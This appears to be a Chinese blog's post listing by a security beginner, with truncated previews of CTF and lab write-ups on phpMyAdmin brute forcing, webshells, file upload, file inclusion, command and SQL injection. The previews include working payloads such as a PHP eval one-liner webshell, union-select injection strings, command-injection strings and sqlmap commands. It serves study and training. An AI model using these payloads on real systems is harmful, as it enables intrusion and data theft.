自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(28)
  • 收藏
  • 关注

原创 phpmyadmin爆破脚本练习

初学python不久 记录一下写脚本的过程思路 过程首先 是要对于phpadmin的账号密码进行爆破先找个环境抓个包看看了解到需要脚本中 准备 请求头 还需要获取到token 最好还能获取到标题 以作验证提交的数据中 需要pma_username pma_password server=1 target=index.php token等数据还要进行会话保持http协议本身是无状态的,为了让请求之间保持状态,有了session和cookie机制。requests也提供了相

2021-08-08 15:53:04 1562

原创 网站备份文件扫描小工具

初学python 尝试写的脚本 ,参考了好哥哥的脚本import requestsurl1 = 'http://www.abc.net' # url为被扫描地址,后不加‘/’# 常见的网站源码备份文件名 同目录下创建List.txt 如web,website,backup,back,www,wwwroot,temp等with open('List1.txt', 'r') as f: list1 = f.read().splitlines() # 常见的网站源码备份文件

2021-08-04 20:10:38 1538

原创 代码执行漏洞总结

代码执行漏洞是把代码注入到Web服务器中执行,而命令执行漏洞执行的系统命令 ,代码执行漏洞有的应用程序提供了一些可以将字符串作为代码执行的函数,如果对这些函数控制不严格,就可能被攻击者利用,执行恶意代码eval函数eval函数把字符串作为PHP代码执行eval(string $code)eval实例代码 比如一句话木马<?php @eval($_POST[1])?>assert函数assert函数检查一个断言是否为FALSEbool assert(mixed $asse

2021-07-25 18:58:15 1547 1

原创 命令执行漏洞总结

命令执行漏洞原理 应用程序某些功能调用可以执行系统命令的函数 如果参数被用户控制 就有可能通过恶意连接符将命令拼接到正常函数中从而随意执行系统命令php常见命令执行函数和运算符system函数用于执行外部程序并显示输出string system ( string $command [,int $return_var ])//index.php<?php system('whoami');?>执行后输出rootexec函数用于执行一个外部程序string exec(s

2021-07-25 16:43:30 807 1

原创 CVE-2017-15715(Apache解析漏洞)

Apache换行解析漏洞影响版本:Apache 2.4.0~2.4.29影响说明:绕过服务器策略,上传webshell环境说明:PHP5.5 、 Apache2.4.10漏洞复现利用如下打开环境即是个文件上传点先上潮汐看Apache百度搜一波我们利用CVE-2017-15715(Apache换行解析漏洞)此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照php 后缀进行解析,导致绕过一些服务器的安全策

2021-07-25 11:14:07 979

原创 文件包含和伪协议漏洞知识总结

文件包含漏洞也是一种“注入型漏洞”其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行php常见的文件包含函数require(),找不到被包含的文件时会产生致命错误,并停止脚本运行。include(),找不到被包含的文件时只会产生警告,脚本将继续运行。include_once()与include()类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含。require_once()与require()类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含。...

2021-07-22 10:33:38 833

原创 一句话木马小总结

一句话木马(简称Webshell)上传到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此先来看看最简单的一句话木马: <?php @eval($_POST['attack' ]);?>利用文件上传漏洞,往目标网站中上传一句话木马,然后就可以在本地通过管理工具即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行$_POST['attack']表示从页面中获得attack这个参

2021-07-19 19:11:54 2138 2

原创 文件上传漏洞总结

文件上传漏洞原理用户或者管理员上传图片,或者其它文件。如果没有限制上传类型或者限制不严格被绕过,就有可能造成文件上传漏洞。上传了可执行文件如木马,病毒,恶意脚本,WebShell等到服务器执行,并最终获得网站控制权限的高危漏洞。上传检测流程通常一个文件以HTTP协议进行上传时,将以POST请求发送至Web服务器,Web服务器接收到请求并同意后,用户与Web服务器将建立连接,并传输数据。客户端javascript校验通过javascript来校验上传文件的后缀是否合法,可以采用白名单,也可以采用

2021-07-19 14:54:01 767

原创 Upload-labs靶场实战

Pass-01考点JS绕过属于前端JS验证了function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定义允许上传的文件类型 var allow_ext = ".jpg|.

2021-07-19 10:10:56 159

原创 tomcat8弱口令&&后台getshell

好哥哥的云服务器搭的靶场已经知道Tomcat manager 登录界面存在弱口令漏洞,登录成功后有上传点,压缩包 xxx.war的.war不会被解析,直接访问 xxx/里面的一句话路径,可直接拿到shell这里是弱口令爆破抓包上bp,看了一眼是id:passwd的形式 还有base64的编码选择用Custom iterator拼接密码进行爆破还要取消特殊字符的encode最后得到密码进入后台的manager/html将带有一句话的shell.jsp小马压缩成zip,并且将压缩后的

2021-07-16 15:21:57 1357

原创 Pikachu靶场实战-file include

本地文件包含随便选了一个F12看到这个东西判断http://127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=//file1.php//&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2修改file1.php可以造成文件读取尝试读取本机host文件 ../../../../Windows/System32/drivers/etc/hosts成功读取远程文件包含构造htt

2021-07-14 15:33:56 207 2

原创 Pikachu靶场实战-XSS

Cross-Site Scripting简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:1.反射性XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有..

2021-07-14 14:46:30 293

原创 Pikachu靶场实战-暴力破解

基于表单的暴力破解BP抓包直接爆破即可得到长度不同的就是了验证码绕过(on sever)抓包发到repeater发现 只修改账号密码 不修改验证码 只会提示账号密码错误 修改验证码 会提醒验证码错误成功登陆之前验证码一直有效直接暴力破解就行账号密码还是原来的验证码绕过(on client)点击login发现没抓到包就提醒错误了 查看源码发现验证码是前端的内容发到repeater发现 只修改账号密码 不修改验证码 只会提示账号密码错误 修改验证码 验证码错误都不

2021-07-14 10:27:51 236

原创 CTFHUB-RCE-文件包含

考点php伪协议 file协议分析过程Shell是这个使用hackbar 构造Playload传参http://challenge-deb7e7e0db233e27.sandbox.ctfhub.com:10800/shell.txtctfhub=system('ls /');ctfhub=system('cat /flag');得到flagctfhub{3a551fa301f8dda0dccd2c7d} php://input考点php伪协议 input协议分析思路

2021-07-11 09:50:08 397

原创 CTFHUB-RCE-eval执行

考点一句话木马 eval执行思路分析打开直接<?phpif (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]);} else { highlight_file(__FILE__);}?>那就直接连蚁剑了。。。。直接找到了得到flagctfhub{587c0757ccda0ba89da63da0}...

2021-07-11 09:49:58 250

原创 CTFHUB-RCE-命令注入

命令注入 无过滤考点属于是纯纯的命令注入思路分析构造playload127.0.0.1|ls发现一个数字串挺长的php构造127.0.0.1|cat 18930164348325.php提交了[1]没有东西可以构造127.0.0.1|cat 18930164348325.php|base64然后base64解码或者不加base64查看源码也能得到playload:ctfhub{af6df24d6b085066d0dc46d3}过滤cat考点过滤cat

2021-07-10 16:56:28 1232

原创 CTFHUB-SQL注入-过滤空格

考点正常的注入 过滤了空格 需要绕过过程分析首先正常注入会提醒HACKER经过尝试发现可以使用/**/代替空格绕过获取数据库信息0/**/union/**/select/**/1,database()/**/获取表信息0/**/union/**/select/**/1,group_concat(table_name)/**/ from/**/information_schema.tables/**/where/**/table_schema='sqli'得到表名whjmqubsk

2021-07-10 15:13:08 850

原创 CTFHUB-SQL注入-refer注入

考点sql refer注入过程分析hackbar发送refer然后发送repeater抓包GET / HTTP/1.1Host: challenge-966dbd291ece3e1d.sandbox.ctfhub.com:10800User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Accept: text/html,application/xhtml+xml

2021-07-10 15:05:16 436

原创 CTFHUB-SQL注入-UA注入

考点SQL注入 UA注入问题分析他直说了UA注入点可以跟Cookie注入一样弄 BP抓包发包也可以直接sqlmap -u去跑 这几个题过程差不多 这里就用工具了因为是UA注入了 所以用level3python2 sqlmap.py -u http://challenge-81256235c2233d23.sandbox.ctfhub.com:10080/ --level 3 --dbs python2 sqlmap.py -u http://challenge-81256235

2021-07-10 14:47:53 1013

原创 CTFHUB-SQL注入-Cookie注入

考点Cookie注入分析过程抓包 发现构造playload:-1 union select database(),version()库名有了找表-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'得到wmgtielast然后还是列名 查信息-1 union select 1,group_concat(column_name) fr

2021-07-10 14:17:56 130

原创 CTFHUB-SQL注入-MySQL结构

考点MySQL的数据库结构数据库1 =网站1表明列名数据数据库2…数据库3…分析过程?id=1 and 1=1?id=1 and 1=2?id=1' and1=1#上句执行了下两句未执行 存在注入查字段1 order by 11 order by 21 order by 32执行 3不执行了 两个字段查看当前数据库233 union select 1,database()库名还是sqli,看表233 union select 1,grou

2021-07-10 14:00:59 419

原创 CTFHUB-SQL注入-时间盲注

考点SQL时间盲注时间盲注攻击利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。分析过程1 and if(length(database())=5,sleep(3),1)1 and if(length(database())=4,sleep(3),1)1 and

2021-07-10 13:38:00 408

原创 CTFHUB-SQL注入-报错注入

报错注入注入过程中经常根据错误回显进行判断,但是现在非常多的Web程序没有正常的错误回显,这样就需要利用报错注入的方式来进行SQL注入了十种MySql报错注入1.floor()select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);2.extractvalue()s

2021-07-10 11:25:54 399

原创 CTFHUB-信息泄露-Git

LogStashIndex

2021-07-10 10:59:19 236

原创 CTFHUB-SQL注入-布尔盲注

考点布尔盲注分析过程想练习一下sqlmap工具的使用于是构造playload:python sqlmap.py -u http://challenge-7d72ad3c949e8282.sandbox.ctfhub.com:10080/?id=1 --dbs找到库名sqli 然后爆表 找到flagpython sqlmap.py -u http://challenge-7d72ad3c949e8282.sandbox.ctfhub.com:10080/?id=1 -D sqli --t

2021-07-10 10:22:16 603 2

原创 CTFHUB-SQL注入-字符型注入

考点字符型SQL注入分析过程先输入个1 因为是字符型注入一般先判断是否存在注入点加单引号后变成三个单引号,则无法执行playload:?id='1''playload:’and 1=1也不行playload:' and 1=1 --'可以成功执行playload: 'and 1=2 --'报错然后判断列数playload:id='1' order by 3 -- ''id='1' order by 2 -- ''3时无回显则字段数量为2查询是第

2021-07-09 17:04:59 311

原创 CTFHUB-SSRF(未完)

内网访问考点内网访问…分析过程hint:尝试访问位于127.0.0.1的flag.php吧http://challenge-961103965419959c.sandbox.ctfhub.com:10800/?url=_打开后是如此URL的空网页构造playloadhttp://challenge-961103965419959c.sandbox.ctfhub.com:10800/?url=127.0.0.1/flag.php得到flagctfhub{507b549cdbc0cc91

2021-07-09 14:00:18 1369

原创 CTFHUB-SQL注入-整数型注入

整数型注入考点 SQL注入-整数型注入

2021-07-05 18:38:53 200

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除